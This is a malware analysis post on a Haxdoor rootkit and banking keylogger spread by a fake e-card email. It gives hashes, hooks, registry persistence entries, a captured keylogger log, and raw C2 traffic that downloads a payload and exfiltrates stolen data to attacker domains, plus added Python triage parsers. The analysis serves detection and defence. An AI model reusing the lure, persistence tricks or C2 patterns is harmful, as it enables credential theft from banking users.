On 11 November 2008, I received an email indicating that I had received an ecard.
Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "123greetings.com" (spoofed)
To: "my love" <.....@gmail.com>
Subject: You have received an eCard
Good day.
You have received an eCard
To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):
hxxp://zonzamas.info/ecard.exe
Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!
We hope you enjoy you eCard.
Thank You!
hxxp://www.123greetings.com
The email included a hyperlink to hxxp://zonzamas.info/ecard.exe. The file ecard.exe is a variant of the Haxdoor malcode family. The domain zonzamas.info is currently registered and hosted in the US (65.98.31.250).
ecard.exe
934fce496508b5dc4ba01f140870d01c
34,440 bytes
The malware ecard.exe creates the following files:
C:\WINDOWS\system32\gzipmod.dll
C:\WINDOWS\system32\vbagz.sys
gzipmod.dll
603ed7f0758bb2957aa94b3e7bd758b2
20,108 bytes
vbagz.sys
3aec76486842e41459e1edd79570b224
7,072 bytes
Both Haxdoor files install as rootkits hiding themselves from the Windows API.
>SSDT State
NtCreateProcess
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtCreateProcessEx
Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtOpenKey
Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtOpenProcess
Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys
NtQueryDirectoryFile
Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys
>Files
Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
>Hooks
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
!!POSSIBLE ROOTKIT ACTIVITY DETECTED!! =)
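As an added example (not part of the original post), the following Python parses a report in the layout shown above and groups the findings the way an analyst triages them: which driver hooks the SSDT, which files the rootkit hides, and which user-mode hooks resolve to unknown_code_page, i.e. memory not backed by any module on disk, the usual sign of injected code. The sample report is a constructed subset of the lines above.

```python
import re
from collections import defaultdict

# Constructed sample in the format of the scanner report above (a subset of its lines).
SAMPLE_REPORT = r""">SSDT State
NtQueryDirectoryFile
Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys
>Files
Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
>Hooks
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
"""
HOOK_RE = re.compile(r"^(?:\[(?P<pid>\d+)\](?P<proc>.+?)-->)?(?P<chain>.+?), Type: .+? at address "
                     r"0x[0-9A-Fa-f]+ hook handler located in \[(?P<handler>[^\]]+)\]$")

def parse_report(text):
    # Walk the report section by section; an SSDT entry is a three-line record.
    ssdt, hidden, hooks, section, i = [], [], [], None, 0
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    while i < len(lines):
        line = lines[i]
        if line.startswith(">"):
            section = line[1:]
        elif section == "SSDT State":
            hooker = lines[i + 2].split(":", 1)[1].strip()   # "Hooked by: <path>"
            ssdt.append((line, lines[i + 1].split()[-1], hooker))
            i += 2
        elif section == "Files" and line.startswith("Suspect File: "):
            hidden.append(line[len("Suspect File: "):].rsplit(" Status: ", 1)[0])
        elif section == "Hooks" and (m := HOOK_RE.match(line)):
            mod, func = m.group("chain").rsplit("-->", 1)
            hooks.append((m.group("proc") or "kernel", mod, func, m.group("handler")))
        i += 1
    return ssdt, hidden, hooks

def triage(text):
    # Which driver hooks the kernel, what is hidden, and which user-mode hooks land in
    # memory not backed by any module on disk (the "unknown_code_page" handlers).
    ssdt, hidden, hooks = parse_report(text)
    by_handler, injected = defaultdict(list), defaultdict(list)
    for proc, mod, func, handler in hooks:
        if handler == "unknown_code_page":
            injected[proc].append(f"{mod}!{func}")
        else:
            by_handler[handler].append(f"{proc}:{mod}!{func}")
    return {"ssdt_hookers": sorted({h.rsplit("\\", 1)[-1] for _, _, h in ssdt}),
            "hidden_files": hidden, "by_handler": dict(by_handler), "injected": dict(injected)}
```

Run against the full report above, the same grouping shows vbagz.sys owning every SSDT and ntoskrnl hook while the wininet hooks in svchost.exe are split between gzipmod.dll and unbacked code pages.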
The malware gzipmod.dll creates:
C:\WINDOWS\System32\answxt.bin
C:\WINDOWS\System32\k86.bin
k86.bin stores the keylogger data. The following log excerpt shows captured logon attempts at US Bank and Wachovia.
00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456
The following registry keys are created to load gzipmod.dll at startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"
The following registry keys are created to load vbagz.sys during a safe-mode boot:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
The following registry entry adds rundll32.exe to the Windows Firewall authorized-applications list (StandardProfile), weakening the host firewall:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32
The following registry entries install vbagz.sys as a service named "VBA2 PnP Driver":
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Type: REG_BINARY
Data: [hexadecimal values]
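As an added example (not part of the original post), the following Python parses the key/Type/Data layout of the listing above, decodes the little-endian REG_DWORD byte dumps, and summarises the three persistence mechanisms the entries establish: the service registration (Start 1 is SERVICE_SYSTEM_START, Type 1 is SERVICE_KERNEL_DRIVER), the SafeBoot entries, and the firewall exception. The sample listing is a constructed subset of the entries above.

```python
import re
from collections import defaultdict
# Constructed sample in the key "value" / Type / Data layout of the listing above.
SAMPLE_LISTING = r"""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Type: REG_EXPAND_SZ
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
"""

START = {0: "boot", 1: "system", 2: "auto", 3: "demand", 4: "disabled"}      # SERVICE_*_START
SVC_TYPE = {1: "kernel driver", 2: "file system driver", 0x10: "own process", 0x20: "shared process"}
KEY_RE = re.compile(r'^(?P<key>HKEY_[^"]+?) "(?P<value>[^"]+)"$')

def parse_listing(text):
    # Each entry is three lines: key "value", Type: <reg type>, Data: <string or byte list>.
    entries, lines = [], [l.strip() for l in text.splitlines() if l.strip()]
    for i in range(0, len(lines), 3):
        m = KEY_RE.match(lines[i])
        rtype, data = (lines[i + j].split(":", 1)[1].strip() for j in (1, 2))
        if rtype == "REG_DWORD":   # dump shows the little-endian bytes "01, 00, 00, 00"
            data = int.from_bytes(bytes(int(b, 16) for b in data.split(", ")), "little")
        entries.append((m.group("key"), m.group("value"), rtype, data))
    return entries

def persistence(entries):
    # Service registration (Start/Type decoded), SafeBoot entries that keep the driver
    # loading in safe mode, and Windows Firewall application exceptions.
    services, safeboot, firewall = defaultdict(dict), [], []
    for key, value, rtype, data in entries:
        if "\\Control\\SafeBoot\\" in key:
            safeboot.append(tuple(key.split("\\SafeBoot\\", 1)[1].split("\\", 1)) + (data,))
        elif key.endswith("\\AuthorizedApplications\\List"):
            firewall.append(tuple(data.rsplit(":", 3)[:3]))   # "<path>:*:Enabled:<name>"
        elif "\\Services\\" in key:
            svc = key.split("\\Services\\", 1)[1].split("\\", 1)[0]
            decode = {"Start": START, "Type": SVC_TYPE}.get(value, {})
            services[svc][value] = decode.get(data, data)
    return {"services": dict(services), "safeboot": safeboot, "firewall": firewall}
```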
The malware connects to cash-babules.com/bolt2/data.php?trackid. The domain cash-babules.com is registered and hosted in Russia (62.167.16.11, SINGER-NET). The request returns instructions to download hxxp://sergej-grienko.com/inj/11-11.bin. The domain sergej-grienko.com is also registered and hosted in Russia (62.167.16.11, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The .bin file stores instructions for creating fake banking institution logon HTML pages and keylogger triggers.
GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: cash-babules.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6
CMND UU0 U4hxxp://sergej-grienko.com/inj/11-11.bin
U4sergej-grienko.com/inj/11-11.bin ED |END
GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: sergej-grienko.com
Keylogger and other harvested data are exfiltrated to cash-babules.com/ie-bolt2/data.php.
POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Host: cash-babules.com
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"